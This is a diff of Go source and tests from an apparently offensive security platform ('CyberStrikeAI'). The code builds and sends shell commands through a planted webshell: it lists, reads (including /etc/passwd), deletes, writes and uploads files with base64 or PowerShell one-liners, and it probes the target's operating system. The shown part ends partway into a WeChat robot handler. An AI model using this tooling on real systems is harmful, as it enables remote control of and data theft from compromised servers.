t.Helper()
|
||||
for _, s := range substrings {
|
||||
if strings.Contains(text, s) {
|
||||
t.Errorf("text should not contain %q\n--- text ---\n%s", s, text)
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,103 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"testing"
|
||||
|
||||
"golang.org/x/text/encoding/simplifiedchinese"
|
||||
"golang.org/x/text/transform"
|
||||
)
|
||||
|
||||
// mustEncode 使用指定编码对 UTF-8 字符串做编码,得到原始字节,用于构造测试输入
|
||||
func mustEncode(t *testing.T, s string, enc string) []byte {
|
||||
t.Helper()
|
||||
var tr transform.Transformer
|
||||
switch enc {
|
||||
case "gbk":
|
||||
tr = simplifiedchinese.GBK.NewEncoder()
|
||||
case "gb18030":
|
||||
tr = simplifiedchinese.GB18030.NewEncoder()
|
||||
default:
|
||||
t.Fatalf("unsupported test encoding: %s", enc)
|
||||
}
|
||||
out, _, err := transform.Bytes(tr, []byte(s))
|
||||
if err != nil {
|
||||
t.Fatalf("mustEncode(%s) failed: %v", enc, err)
|
||||
}
|
||||
return out
|
||||
}
|
||||
|
||||
func TestNormalizeWebshellEncoding(t *testing.T) {
|
||||
cases := map[string]string{
|
||||
"": "auto",
|
||||
" ": "auto",
|
||||
"auto": "auto",
|
||||
"AUTO": "auto",
|
||||
"utf-8": "utf-8",
|
||||
"UTF-8": "utf-8",
|
||||
"utf8": "utf-8",
|
||||
"gbk": "gbk",
|
||||
"GBK": "gbk",
|
||||
"gb18030": "gb18030",
|
||||
"big5": "auto", // 未支持的回退到 auto
|
||||
"anything": "auto",
|
||||
}
|
||||
for in, want := range cases {
|
||||
if got := normalizeWebshellEncoding(in); got != want {
|
||||
t.Errorf("normalizeWebshellEncoding(%q) = %q, want %q", in, got, want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestDecodeWebshellOutput_AutoDetectsGBK(t *testing.T) {
|
||||
// 模拟 Windows 中文 cmd 输出的 GBK 字节流
|
||||
want := "用户名 SID 类型"
|
||||
raw := mustEncode(t, want, "gbk")
|
||||
|
||||
// auto 模式:UTF-8 校验失败后应当回退 GB18030 解码,得到原始中文
|
||||
got := decodeWebshellOutput(raw, "auto")
|
||||
if got != want {
|
||||
t.Errorf("decodeWebshellOutput(auto) = %q, want %q", got, want)
|
||||
}
|
||||
|
||||
// 显式 GBK 模式:同样应当正确解码
|
||||
got = decodeWebshellOutput(raw, "gbk")
|
||||
if got != want {
|
||||
t.Errorf("decodeWebshellOutput(gbk) = %q, want %q", got, want)
|
||||
}
|
||||
|
||||
// 显式 GB18030 模式:GBK 是 GB18030 子集,也应正确解码
|
||||
got = decodeWebshellOutput(raw, "gb18030")
|
||||
if got != want {
|
||||
t.Errorf("decodeWebshellOutput(gb18030) = %q, want %q", got, want)
|
||||
}
|
||||
}
|
||||
|
||||
func TestDecodeWebshellOutput_PassthroughUTF8(t *testing.T) {
|
||||
// 已经是 UTF-8 的中文字符串,各模式都应返回原串(不破坏)
|
||||
want := "hello 世界"
|
||||
for _, enc := range []string{"", "auto", "utf-8"} {
|
||||
if got := decodeWebshellOutput([]byte(want), enc); got != want {
|
||||
t.Errorf("decodeWebshellOutput(%q) passthrough = %q, want %q", enc, got, want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestDecodeWebshellOutput_ASCIIStable(t *testing.T) {
|
||||
// 纯 ASCII 在任何模式下都必须保持原样
|
||||
want := "whoami\nAdministrator\n"
|
||||
for _, enc := range []string{"", "auto", "utf-8", "gbk", "gb18030"} {
|
||||
if got := decodeWebshellOutput([]byte(want), enc); got != want {
|
||||
t.Errorf("decodeWebshellOutput(%q) ASCII = %q, want %q", enc, got, want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestDecodeWebshellOutput_EmptyInput(t *testing.T) {
|
||||
// 空输入直接返回空串,不做额外分配
|
||||
if got := decodeWebshellOutput(nil, "gbk"); got != "" {
|
||||
t.Errorf("decodeWebshellOutput(nil) = %q, want empty", got)
|
||||
}
|
||||
if got := decodeWebshellOutput([]byte{}, "auto"); got != "" {
|
||||
t.Errorf("decodeWebshellOutput([]) = %q, want empty", got)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,348 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"encoding/base64"
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
func newTestWebShellHandler() *WebShellHandler {
|
||||
return NewWebShellHandler(zap.NewNop(), nil)
|
||||
}
|
||||
|
||||
func TestNormalizeWebshellOS(t *testing.T) {
|
||||
cases := map[string]string{
|
||||
"": "auto",
|
||||
" ": "auto",
|
||||
"auto": "auto",
|
||||
"AUTO": "auto",
|
||||
"linux": "linux",
|
||||
"Linux": "linux",
|
||||
"windows": "windows",
|
||||
"WINDOWS": "windows",
|
||||
"macos": "auto", // 未支持的回退 auto
|
||||
"solaris": "auto",
|
||||
}
|
||||
for in, want := range cases {
|
||||
if got := normalizeWebshellOS(in); got != want {
|
||||
t.Errorf("normalizeWebshellOS(%q) = %q, want %q", in, got, want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestResolveWebshellOS(t *testing.T) {
|
||||
type testCase struct {
|
||||
osTag string
|
||||
shellType string
|
||||
want string
|
||||
}
|
||||
cases := []testCase{
|
||||
// 显式 OS:按用户选择,忽略 shellType
|
||||
{"linux", "asp", "linux"},
|
||||
{"windows", "php", "windows"},
|
||||
{"LINUX", "jsp", "linux"},
|
||||
|
||||
// auto + 各种 shellType:asp/aspx → windows,其他 → linux
|
||||
{"auto", "asp", "windows"},
|
||||
{"auto", "aspx", "windows"},
|
||||
{"auto", "ASP", "windows"},
|
||||
{"auto", "php", "linux"},
|
||||
{"auto", "jsp", "linux"},
|
||||
{"auto", "custom", "linux"},
|
||||
{"auto", "", "linux"},
|
||||
|
||||
// 空/未知 OS 等价 auto
|
||||
{"", "asp", "windows"},
|
||||
{"", "php", "linux"},
|
||||
{"unknown", "aspx", "windows"},
|
||||
}
|
||||
for _, c := range cases {
|
||||
got := resolveWebshellOS(c.osTag, c.shellType)
|
||||
if got != c.want {
|
||||
t.Errorf("resolveWebshellOS(%q,%q) = %q, want %q", c.osTag, c.shellType, got, c.want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestQuoteCmdPath(t *testing.T) {
|
||||
cases := map[string]string{
|
||||
"": `"."`,
|
||||
`C:\Windows\Temp`: `"C:\Windows\Temp"`,
|
||||
`C:\Program Files\a`: `"C:\Program Files\a"`,
|
||||
`C:\weird"name\f.txt`: `"C:\weird""name\f.txt"`,
|
||||
`.`: `"."`,
|
||||
}
|
||||
for in, want := range cases {
|
||||
if got := quoteCmdPath(in); got != want {
|
||||
t.Errorf("quoteCmdPath(%q) = %q, want %q", in, got, want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestQuoteShellSinglePosix(t *testing.T) {
|
||||
cases := map[string]string{
|
||||
"": ".",
|
||||
"/tmp/a b": "'/tmp/a b'",
|
||||
"/tmp/it's.txt": `'/tmp/it'\''s.txt'`,
|
||||
}
|
||||
for in, want := range cases {
|
||||
if got := quoteShellSinglePosix(in); got != want {
|
||||
t.Errorf("quoteShellSinglePosix(%q) = %q, want %q", in, got, want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// TestBuildFileCommand_LinuxBranch 覆盖 Linux 目标下每个 action 产出的命令
|
||||
func TestBuildFileCommand_LinuxBranch(t *testing.T) {
|
||||
h := newTestWebShellHandler()
|
||||
base := fileCommandInput{OS: "linux", ShellType: "php"}
|
||||
|
||||
mustContain := func(t *testing.T, cmd string, substrings ...string) {
|
||||
t.Helper()
|
||||
for _, s := range substrings {
|
||||
if !strings.Contains(cmd, s) {
|
||||
t.Errorf("expected command to contain %q, got: %s", s, cmd)
|
||||
}
|
||||
}
|
||||
}
|
||||
mustNotContain := func(t *testing.T, cmd string, substrings ...string) {
|
||||
t.Helper()
|
||||
for _, s := range substrings {
|
||||
if strings.Contains(cmd, s) {
|
||||
t.Errorf("command should not contain %q, got: %s", s, cmd)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// list with empty path defaults to '.'
|
||||
in := base
|
||||
in.Action = "list"
|
||||
cmd, err := h.buildFileCommand(in)
|
||||
if err != nil {
|
||||
t.Fatalf("list linux: unexpected err: %v", err)
|
||||
}
|
||||
mustContain(t, cmd, "ls -la", "'.'")
|
||||
|
||||
// list with path containing spaces
|
||||
in.Path = "/tmp/my files"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "ls -la ", "'/tmp/my files'")
|
||||
|
||||
// read with path
|
||||
in = base
|
||||
in.Action = "read"
|
||||
in.Path = "/etc/passwd"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "cat ", "'/etc/passwd'")
|
||||
|
||||
// read without path → error
|
||||
in.Path = ""
|
||||
if _, err := h.buildFileCommand(in); err != errFileOpPathRequired {
|
||||
t.Errorf("read empty path: want errFileOpPathRequired, got %v", err)
|
||||
}
|
||||
|
||||
// delete
|
||||
in = base
|
||||
in.Action = "delete"
|
||||
in.Path = "/tmp/a.txt"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "rm -f ", "'/tmp/a.txt'")
|
||||
mustNotContain(t, cmd, "del")
|
||||
|
||||
// mkdir
|
||||
in.Action = "mkdir"
|
||||
in.Path = "/tmp/new/sub"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "mkdir -p ", "'/tmp/new/sub'")
|
||||
|
||||
// rename
|
||||
in = base
|
||||
in.Action = "rename"
|
||||
in.Path = "/tmp/a"
|
||||
in.TargetPath = "/tmp/b"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "mv -f ", "'/tmp/a'", "'/tmp/b'")
|
||||
|
||||
// rename missing target → error
|
||||
in.TargetPath = ""
|
||||
if _, err := h.buildFileCommand(in); err != errFileOpRenameNeedsBothPaths {
|
||||
t.Errorf("rename empty target: want errFileOpRenameNeedsBothPaths, got %v", err)
|
||||
}
|
||||
|
||||
// write
|
||||
in = base
|
||||
in.Action = "write"
|
||||
in.Path = "/tmp/w.txt"
|
||||
in.Content = "hello 世界"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
b64 := base64.StdEncoding.EncodeToString([]byte("hello 世界"))
|
||||
mustContain(t, cmd, "echo '"+b64+"'", "| base64 -d", "> '/tmp/w.txt'")
|
||||
|
||||
// upload
|
||||
in = base
|
||||
in.Action = "upload"
|
||||
in.Path = "/tmp/bin"
|
||||
in.Content = "YWJjZA==" // base64 of "abcd"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "echo 'YWJjZA=='", "| base64 -d", "> '/tmp/bin'")
|
||||
|
||||
// upload oversized content → error
|
||||
in.Content = strings.Repeat("A", 513*1024)
|
||||
if _, err := h.buildFileCommand(in); err != errFileOpUploadTooLarge {
|
||||
t.Errorf("upload too large: want errFileOpUploadTooLarge, got %v", err)
|
||||
}
|
||||
|
||||
// upload_chunk with chunk_index=0 uses single redirect
|
||||
in = base
|
||||
in.Action = "upload_chunk"
|
||||
in.Path = "/tmp/bin"
|
||||
in.Content = "YWJj"
|
||||
in.ChunkIndex = 0
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "base64 -d > '/tmp/bin'")
|
||||
mustNotContain(t, cmd, ">>")
|
||||
|
||||
// upload_chunk with chunk_index>0 uses append redirect
|
||||
in.ChunkIndex = 1
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "base64 -d >> '/tmp/bin'")
|
||||
|
||||
// unsupported action
|
||||
in = base
|
||||
in.Action = "nope"
|
||||
if _, err := h.buildFileCommand(in); err == nil || !strings.Contains(err.Error(), "unsupported action") {
|
||||
t.Errorf("unknown action: want unsupported action error, got %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// TestBuildFileCommand_WindowsBranch 覆盖 Windows 目标下每个 action 产出的命令
|
||||
func TestBuildFileCommand_WindowsBranch(t *testing.T) {
|
||||
h := newTestWebShellHandler()
|
||||
base := fileCommandInput{OS: "windows", ShellType: "php"}
|
||||
|
||||
mustContain := func(t *testing.T, cmd string, substrings ...string) {
|
||||
t.Helper()
|
||||
for _, s := range substrings {
|
||||
if !strings.Contains(cmd, s) {
|
||||
t.Errorf("expected command to contain %q, got: %s", s, cmd)
|
||||
}
|
||||
}
|
||||
}
|
||||
mustNotContain := func(t *testing.T, cmd string, substrings ...string) {
|
||||
t.Helper()
|
||||
for _, s := range substrings {
|
||||
if strings.Contains(cmd, s) {
|
||||
t.Errorf("command should not contain %q, got: %s", s, cmd)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// list
|
||||
in := base
|
||||
in.Action = "list"
|
||||
cmd, _ := h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "dir /a ", `"."`)
|
||||
mustNotContain(t, cmd, "ls -la")
|
||||
|
||||
in.Path = `C:\Users\Public Docs`
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "dir /a ", `"C:\Users\Public Docs"`)
|
||||
|
||||
// read
|
||||
in = base
|
||||
in.Action = "read"
|
||||
in.Path = `C:\flag.txt`
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "type ", `"C:\flag.txt"`)
|
||||
|
||||
// delete
|
||||
in.Action = "delete"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "del /q /f ", `"C:\flag.txt"`)
|
||||
mustNotContain(t, cmd, "rm -f")
|
||||
|
||||
// mkdir
|
||||
in.Action = "mkdir"
|
||||
in.Path = `C:\a\b\c`
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "md ", `"C:\a\b\c"`)
|
||||
|
||||
// rename
|
||||
in = base
|
||||
in.Action = "rename"
|
||||
in.Path = `C:\a.txt`
|
||||
in.TargetPath = `C:\b.txt`
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "move /y ", `"C:\a.txt"`, `"C:\b.txt"`)
|
||||
|
||||
// write → PowerShell base64 one-liner
|
||||
in = base
|
||||
in.Action = "write"
|
||||
in.Path = `C:\out.txt`
|
||||
in.Content = "hello 世界"
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
wantB64 := base64.StdEncoding.EncodeToString([]byte("hello 世界"))
|
||||
mustContain(t, cmd,
|
||||
"powershell -NoProfile -NonInteractive -Command",
|
||||
"[Convert]::FromBase64String('"+wantB64+"')",
|
||||
"[IO.File]::WriteAllBytes('C:\\out.txt'",
|
||||
)
|
||||
mustNotContain(t, cmd, "echo ", "base64 -d")
|
||||
|
||||
// upload (chunk_index=0 equivalent) uses WriteAllBytes
|
||||
in = base
|
||||
in.Action = "upload"
|
||||
in.Path = `C:\bin\f`
|
||||
in.Content = "YWJjZA=="
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "WriteAllBytes('C:\\bin\\f'", "FromBase64String('YWJjZA==')")
|
||||
|
||||
// upload_chunk index=0 → WriteAllBytes
|
||||
in.Action = "upload_chunk"
|
||||
in.ChunkIndex = 0
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "WriteAllBytes(")
|
||||
mustNotContain(t, cmd, "FileMode]::Append")
|
||||
|
||||
// upload_chunk index>0 → append (Open with Append mode)
|
||||
in.ChunkIndex = 1
|
||||
cmd, _ = h.buildFileCommand(in)
|
||||
mustContain(t, cmd, "[IO.FileMode]::Append", "FromBase64String('YWJjZA==')")
|
||||
}
|
||||
|
||||
// TestBuildFileCommand_AutoFallbackMatchesLegacyBehavior 确保 os=auto 时与旧版 shellType 判定行为完全一致
|
||||
// asp/aspx 视为 Windows(旧行为),其他视为 Linux。
|
||||
func TestBuildFileCommand_AutoFallbackMatchesLegacyBehavior(t *testing.T) {
|
||||
h := newTestWebShellHandler()
|
||||
|
||||
// asp + auto → windows 命令
|
||||
cmd, _ := h.buildFileCommand(fileCommandInput{Action: "list", OS: "auto", ShellType: "asp"})
|
||||
if !strings.Contains(cmd, "dir /a") {
|
||||
t.Errorf("auto + asp should use Windows cmd, got: %s", cmd)
|
||||
}
|
||||
|
||||
cmd, _ = h.buildFileCommand(fileCommandInput{Action: "list", OS: "auto", ShellType: "aspx"})
|
||||
if !strings.Contains(cmd, "dir /a") {
|
||||
t.Errorf("auto + aspx should use Windows cmd, got: %s", cmd)
|
||||
}
|
||||
|
||||
// php/jsp/custom + auto → linux 命令(与历史行为一致)
|
||||
for _, st := range []string{"php", "jsp", "custom", ""} {
|
||||
cmd, _ = h.buildFileCommand(fileCommandInput{Action: "list", OS: "auto", ShellType: st})
|
||||
if !strings.Contains(cmd, "ls -la") {
|
||||
t.Errorf("auto + %q should use Linux cmd, got: %s", st, cmd)
|
||||
}
|
||||
}
|
||||
|
||||
// 显式 OS 覆盖 shellType
|
||||
cmd, _ = h.buildFileCommand(fileCommandInput{Action: "list", OS: "windows", ShellType: "php"})
|
||||
if !strings.Contains(cmd, "dir /a") {
|
||||
t.Errorf("explicit windows should override php shellType, got: %s", cmd)
|
||||
}
|
||||
cmd, _ = h.buildFileCommand(fileCommandInput{Action: "list", OS: "linux", ShellType: "asp"})
|
||||
if !strings.Contains(cmd, "ls -la") {
|
||||
t.Errorf("explicit linux should override asp shellType, got: %s", cmd)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,127 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"io"
|
||||
"net/http"
|
||||
"strings"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// webshellOSProbeCommand 探活命令:利用 Windows cmd 与 POSIX shell 对 `%OS%` 展开差异进行判定。
|
||||
// - Windows cmd:`%OS%` 被展开为 `Windows_NT`,回显 `:OSPROBE_Windows_NT:END`
|
||||
// - POSIX sh/bash:`%OS%` 不是变量语法,作为字面量原样保留,回显 `:OSPROBE_%OS%:END`
|
||||
//
|
||||
// 一条命令即可得到明确的、互斥的信号,避免探活成本(相比发两次命令)。
|
||||
// 冒号包裹是为了避免部分 shell 输出多余空白/BOM 时字符串匹配失效。
|
||||
const webshellOSProbeCommand = "echo :OSPROBE_%OS%:END"
|
||||
|
||||
// probeWebshellOSViaExec 通过一次命令执行的回显推断目标操作系统。
|
||||
//
|
||||
// 返回值:
|
||||
// - "windows" / "linux":识别成功
|
||||
// - "":无法判定(调用方应保留既有 fallback 逻辑)
|
||||
//
|
||||
// 入参 execFn 是一个"发命令并拿到回显"的闭包;让 HTTP 入口和 MCP 入口可以共用同一套探活逻辑
|
||||
// 而不必关心底层是如何发包的。
|
||||
func probeWebshellOSViaExec(execFn func(cmd string) (output string, ok bool)) string {
|
||||
if execFn == nil {
|
||||
return ""
|
||||
}
|
||||
out, ok := execFn(webshellOSProbeCommand)
|
||||
if !ok {
|
||||
return ""
|
||||
}
|
||||
return classifyWebshellOSProbeOutput(out)
|
||||
}
|
||||
|
||||
// classifyWebshellOSProbeOutput 纯函数:根据探活命令的回显判定 OS。
|
||||
// 抽出来是为了单测可直接覆盖所有分支,无需真实 HTTP 调用。
|
||||
func classifyWebshellOSProbeOutput(out string) string {
|
||||
if out == "" {
|
||||
return ""
|
||||
}
|
||||
lower := strings.ToLower(out)
|
||||
|
||||
// Windows 强信号:cmd.exe 成功展开了 %OS% 变量
|
||||
if strings.Contains(out, "Windows_NT") {
|
||||
return "windows"
|
||||
}
|
||||
// 容错:部分老版本 Windows 可能 `%OS%` 展开为其他字样(极少见),再看 PATH/OS 等次级线索
|
||||
if strings.Contains(lower, "microsoft windows") {
|
||||
return "windows"
|
||||
}
|
||||
|
||||
// Linux/Unix 强信号:`%OS%` 字面量被原样回显,说明 shell 不是 cmd.exe
|
||||
if strings.Contains(out, "%OS%") {
|
||||
return "linux"
|
||||
}
|
||||
|
||||
// 次级线索:部分 webshell 在 Linux 上可能走了其他外壳(如 zsh/ash),
|
||||
// 但它们对 `%OS%` 同样不展开;若命中 OSPROBE 头部却没拿到 %OS% 字面量,
|
||||
// 说明回显被中途截断或过滤,保守返回空让上层 fallback。
|
||||
return ""
|
||||
}
|
||||
|
||||
// newHTTPExecFn 为 HTTP FileOp 路径构造"发命令取回显"的闭包,供探活复用。
|
||||
// 参数来自 HTTP 请求,复用 buildExecURL / buildExecBody 两个已有的命令编排器,
|
||||
// 确保探活包与实际文件操作包走完全一致的 webshell 协议(GET/POST、参数名、编码)。
|
||||
func (h *WebShellHandler) newHTTPExecFn(targetURL, password, shellType, method, cmdParam, encoding string) func(string) (string, bool) {
|
||||
useGET := strings.ToUpper(strings.TrimSpace(method)) == "GET"
|
||||
if strings.TrimSpace(cmdParam) == "" {
|
||||
cmdParam = "cmd"
|
||||
}
|
||||
return func(cmd string) (string, bool) {
|
||||
var (
|
||||
httpReq *http.Request
|
||||
err error
|
||||
)
|
||||
if useGET {
|
||||
u := h.buildExecURL(targetURL, shellType, password, cmdParam, cmd)
|
||||
httpReq, err = http.NewRequest(http.MethodGet, u, nil)
|
||||
} else {
|
||||
body := h.buildExecBody(shellType, password, cmdParam, cmd)
|
||||
httpReq, err = http.NewRequest(http.MethodPost, targetURL, bytes.NewReader(body))
|
||||
if err == nil {
|
||||
httpReq.Header.Set("Content-Type", "application/x-www-form-urlencoded")
|
||||
}
|
||||
}
|
||||
if err != nil {
|
||||
return "", false
|
||||
}
|
||||
httpReq.Header.Set("User-Agent", "Mozilla/5.0 (compatible; CyberStrikeAI-WebShell/1.0)")
|
||||
resp, err := h.client.Do(httpReq)
|
||||
if err != nil {
|
||||
return "", false
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
raw, _ := io.ReadAll(resp.Body)
|
||||
return decodeWebshellOutput(raw, encoding), resp.StatusCode == http.StatusOK
|
||||
}
|
||||
}
|
||||
|
||||
// persistDetectedOS 把探活结果回写到连接表;失败只记日志不阻断主流程。
|
||||
// 设计上故意只触发 UPDATE,不会新建记录,因此即便 connectionID 不存在也只是悄悄放弃。
|
||||
func (h *WebShellHandler) persistDetectedOS(connectionID, detected string) {
|
||||
connectionID = strings.TrimSpace(connectionID)
|
||||
detected = normalizeWebshellOS(detected)
|
||||
if connectionID == "" || detected == "" || detected == "auto" {
|
||||
return
|
||||
}
|
||||
conn, err := h.db.GetWebshellConnection(connectionID)
|
||||
if err != nil || conn == nil {
|
||||
// 不是所有调用方都能提供有效 ID(比如临时测试),这里静默返回
|
||||
return
|
||||
}
|
||||
if normalizeWebshellOS(conn.OS) != "auto" {
|
||||
// 用户已经显式选过 OS,尊重用户选择,不自动覆盖
|
||||
return
|
||||
}
|
||||
conn.OS = detected
|
||||
if err := h.db.UpdateWebshellConnection(conn); err != nil {
|
||||
h.logger.Warn("webshell 探活结果持久化失败", zap.String("id", connectionID), zap.String("os", detected), zap.Error(err))
|
||||
return
|
||||
}
|
||||
h.logger.Info("webshell auto OS 探活成功并持久化", zap.String("id", connectionID), zap.String("os", detected))
|
||||
}
|
||||
@@ -0,0 +1,68 @@
|
||||
package handler
|
||||
|
||||
import "testing"
|
||||
|
||||
func TestClassifyWebshellOSProbeOutput(t *testing.T) {
|
||||
cases := []struct {
|
||||
name string
|
||||
in string
|
||||
want string
|
||||
}{
|
||||
{"Windows cmd 回显完整", ":OSPROBE_Windows_NT:END\r\n", "windows"},
|
||||
{"Windows cmd 回显带额外空行", "\r\n:OSPROBE_Windows_NT:END\r\n", "windows"},
|
||||
{"Windows 次级线索 - ver banner", "Microsoft Windows [版本 10.0.19045]\r\n", "windows"},
|
||||
{"Linux sh 字面量回显", ":OSPROBE_%OS%:END\n", "linux"},
|
||||
{"Linux 紧凑输出(无换行)", ":OSPROBE_%OS%:END", "linux"},
|
||||
{"空输出 - 无法判定", "", ""},
|
||||
{"被过滤的输出 - 无法判定", "something weird", ""},
|
||||
{"仅有 OSPROBE 前缀但被截断 - 保守返回空", ":OSPROBE_:END", ""},
|
||||
}
|
||||
for _, c := range cases {
|
||||
if got := classifyWebshellOSProbeOutput(c.in); got != c.want {
|
||||
t.Errorf("case %q: got %q, want %q", c.name, got, c.want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestProbeWebshellOSViaExec_SendsOneCommandOnly(t *testing.T) {
|
||||
var calls []string
|
||||
fn := func(cmd string) (string, bool) {
|
||||
calls = append(calls, cmd)
|
||||
return ":OSPROBE_Windows_NT:END", true
|
||||
}
|
||||
got := probeWebshellOSViaExec(fn)
|
||||
if got != "windows" {
|
||||
t.Fatalf("want windows, got %q", got)
|
||||
}
|
||||
if len(calls) != 1 {
|
||||
t.Fatalf("probe should issue exactly one exec call, got %d: %v", len(calls), calls)
|
||||
}
|
||||
if calls[0] != webshellOSProbeCommand {
|
||||
t.Errorf("probe command mismatch: got %q", calls[0])
|
||||
}
|
||||
}
|
||||
|
||||
func TestProbeWebshellOSViaExec_NotOkReturnsEmpty(t *testing.T) {
|
||||
// HTTP 非 200 的场景:execFn 返回 ok=false,探活应放弃
|
||||
fn := func(cmd string) (string, bool) { return "whatever", false }
|
||||
if got := probeWebshellOSViaExec(fn); got != "" {
|
||||
t.Errorf("want empty when exec not ok, got %q", got)
|
||||
}
|
||||
}
|
||||
|
||||
func TestProbeWebshellOSViaExec_NilSafeguard(t *testing.T) {
|
||||
if got := probeWebshellOSViaExec(nil); got != "" {
|
||||
t.Errorf("nil execFn should return empty, got %q", got)
|
||||
}
|
||||
}
|
||||
|
||||
func TestProbeWebshellOSViaExec_LinuxUname(t *testing.T) {
|
||||
// 某些 webshell 对 `%OS%` 字面量也会过滤(例如安全规则),
|
||||
// 但主要路径是"%OS% 字面量被原样回显"。这里覆盖标准 Linux 场景。
|
||||
fn := func(cmd string) (string, bool) {
|
||||
return ":OSPROBE_%OS%:END\n", true
|
||||
}
|
||||
if got := probeWebshellOSViaExec(fn); got != "linux" {
|
||||
t.Errorf("Linux case: want linux, got %q", got)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,293 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"context"
|
||||
"net/http"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/robot/ilink"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"github.com/google/uuid"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
const wechatLoginTTL = 5 * time.Minute
|
||||
|
||||
// WechatConfigSaver 绑定成功后写入配置并重启机器人连接
|
||||
type WechatConfigSaver interface {
|
||||
ApplyWechatRobotBinding(cfg config.RobotWechatConfig) error
|
||||
}
|
||||
|
||||
type wechatLoginSession struct {
|
||||
QRCode string
|
||||
QRCodeImgURL string
|
||||
PendingVerify string
|
||||
CurrentBaseURL string
|
||||
StartedAt time.Time
|
||||
}
|
||||
|
||||
// WechatRobotHandler 微信 iLink 机器人(扫码绑定 + 配置)
|
||||
type WechatRobotHandler struct {
|
||||
config *config.Config
|
||||
configSaver WechatConfigSaver
|
||||
logger *zap.Logger
|
||||
mu sync.Mutex
|
||||
logins map[string]*wechatLoginSession
|
||||
}
|
||||
|
||||
// NewWechatRobotHandler 创建微信机器人处理器
|
||||
func NewWechatRobotHandler(cfg *config.Config, saver WechatConfigSaver, logger *zap.Logger) *WechatRobotHandler {
|
||||
return &WechatRobotHandler{
|
||||
config: cfg,
|
||||
configSaver: saver,
|
||||
logger: logger,
|
||||
logins: make(map[string]*wechatLoginSession),
|
||||
}
|
||||
}
|
||||
|
||||
func (h *WechatRobotHandler) purgeExpiredLogins() {
|
||||
now := time.Now()
|
||||
for k, v := range h.logins {
|
||||
if now.Sub(v.StartedAt) > wechatLoginTTL {
|
||||
delete(h.logins, k)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (h *WechatRobotHandler) ilinkClient(baseURL string) *ilink.Client {
|
||||
ver := h.config.Version
|
||||
if ver == "" {
|
||||
ver = "1.0.0"
|
||||
}
|
||||
ver = strings.TrimPrefix(strings.TrimSpace(ver), "v")
|
||||
ver = strings.TrimPrefix(ver, "V")
|
||||
wc := h.config.Robots.Wechat
|
||||
return ilink.NewClient(baseURL, wc.BotToken, wc.BotAgent, ilink.BuildClientVersion(ver))
|
||||
}
|
||||
|
||||
// HandleWechatQRCode POST /api/robot/wechat/qrcode — 生成绑定二维码
|
||||
func (h *WechatRobotHandler) HandleWechatQRCode(c *gin.Context) {
|
||||
h.mu.Lock()
|
||||
h.purgeExpiredLogins()
|
||||
h.mu.Unlock()
|
||||
|
||||
var req struct {
|
||||
BotType string `json:"bot_type"`
|
||||
}
|
||||
_ = c.ShouldBindJSON(&req)
|
||||
|
||||
botType := req.BotType
|
||||
if botType == "" {
|
||||
botType = h.config.Robots.Wechat.BotType
|
||||
}
|
||||
if botType == "" {
|
||||
botType = ilink.DefaultBotType
|
||||
}
|
||||
baseURL := h.config.Robots.Wechat.BaseURL
|
||||
if baseURL == "" {
|
||||
baseURL = ilink.DefaultBaseURL
|
||||
}
|
||||
|
||||
var localTokens []string
|
||||
if t := h.config.Robots.Wechat.BotToken; t != "" {
|
||||
localTokens = []string{t}
|
||||
}
|
||||
|
||||
client := h.ilinkClient(baseURL)
|
||||
ctx, cancel := context.WithTimeout(c.Request.Context(), 30*time.Second)
|
||||
defer cancel()
|
||||
|
||||
qr, err := client.GetBotQRCode(ctx, botType, localTokens)
|
||||
if err != nil {
|
||||
h.logger.Warn("获取微信二维码失败", zap.Error(err))
|
||||
